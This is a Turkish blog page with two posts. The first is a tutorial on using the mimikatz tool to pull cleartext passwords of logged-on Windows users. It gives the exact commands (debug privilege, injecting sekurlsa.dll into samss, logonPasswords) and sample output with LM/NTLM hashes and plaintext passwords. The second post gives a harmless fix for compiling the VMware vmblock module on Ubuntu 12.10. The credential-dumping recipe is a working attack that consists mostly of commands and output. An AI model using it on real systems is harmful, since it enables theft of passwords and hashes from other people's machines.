23 Ekim 2012 Salı

Mimikatz ile Aktif Kullanıcı Parolalarını Almak

Hedef sistem üzerinde aktif olarak oturum açmış kullanıcı hesaplarına ait parolalar mimikatz aracı ile salt metin (clear text) olarak alınabiliyor.

Bunun için yapılması gereken mimikatz aracının hedef sisteme yüklemek, çalıştırmak ve ardından sekurlsa.dll dosyasını enjekte ederek, @getLogonPasswords komutu ile aktif oturumların parolalarını almak...

C:\mimi>mimikatz
mimikatz 1.0 x86 (RC)    /* Traitement du Kiwi (Oct 13 2012 13:47:20) */
// http://blog.gentilkiwi.com/mimikatz
...
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
...
mimikatz # inject::service samss sekurlsa.dll
...
mimikatz # @getLogonPasswords full 
Bu komutun ardından aktif olarak oturum açmış bulunan kullanıcı hesaplarına ait açık haldeki parolalar ve hash bilgileri aşağıdaki gibi listelenecektir. Aşağıda kırmızı ile işaretlediğim "Mot de passe:" başlıkları altında kullanıcı parolalarının listelendiğini görebilirsiniz...

Authentification Id         : 0;242741
Package d'authentification  : NTLM
Utilisateur principal       : oem
Domaine d'authentification  : oem-Bilgisayar
    msv1_0 :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Hash LM      : b42c04ccf43253bbaad3b435b51404ee
     * Hash NTLM    : ebe666e1cfd412358a0977fef42c76dd
    wdigest :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat
    tspkg :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat
    kerberos :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat


Authentification Id         : 0;137629
Package d'authentification  : NTLM
Utilisateur principal       : user
Domaine d'authentification  : oem-Bilgisayar
 msv1_0 :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Hash LM      : 2b3137035a2b985b08bd455a508ea203
  * Hash NTLM    : d4605c09dbb7d109ff993066671b72ac
 wdigest :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6
 tspkg :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6
 kerberos :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6

Gentil Kiwi tarafından yapılan yorumdan sonra gelen düzenleme:
Aktif parola listesini almak için aşağıdaki komutları vermek yeterli olacakmış. İşleri bu kadar uzatmaya gerek yokmuş...

C:\mimi>mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full


Ubuntu 12.10 Vmware Blocking File System Problemi

Ubuntu 12.10 sürümünüde Linux 3.5.0-17-generic çekirdeği geliyor. Vmware Workstation 8.0.2 ise 3.5.x çekirdeği üzeride blocking file system modülünü derlemeyi başaramıyor. Bu modülün derlenmesi için /usr/lib/vmware/modules/source/vmblock.tar dosyası içerisindeki filesystem.c dosyasında küçük bir düzenleme yapmak gerekiyor.

Öncelikle vmblock.tar dosyasını /tmp altında bir yere açalım...

mkdir /tmp/vmblock
tar xvf /usr/lib/vmware/modules/source/vmblock.tar -C /tmp/vmblock

Biraz önce tar dosyasından çıkardığımız
/tmp/vmblock/vmblock-only/linux/filessytem.c dosyasını en sevdiğimiz metin edörü ile açarak içerisinde 528. satırdan başlayan aşağıdaki ifadeyi buluyoruz.

   rootDentry = d_alloc_root(rootInode);
   if (!rootDentry) {
      iput(rootInode);
      return -ENOMEM;
   }

Bulduğumuz ve yukarıdaki gibi görünen satırları aşağıdaki gibi değiştiriyoruz...

   #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 4, 0)
      rootDentry = d_alloc_root(rootInode);
   #else
      rootDentry = d_make_root(rootInode);
   #endif

   if (!rootDentry) {
      iput(rootInode);
      return -ENOMEM;
   } 

filessytem.c dosyasında gerekli değişikliği yaparak kayıt ettikten sonra vmblock.tar dosyasını yeniden oluşturmamız gerekiyor.

cd /tmp/vmblock/
tar cvf /usr/lib/vmware/modules/source/vmblock.tar .


vmblock.tar dosyaısnı yeniden oluşturduğumuza göre artık vmware'i başlatıp modüllerin derlenemesini keyifle izleyebiliriz...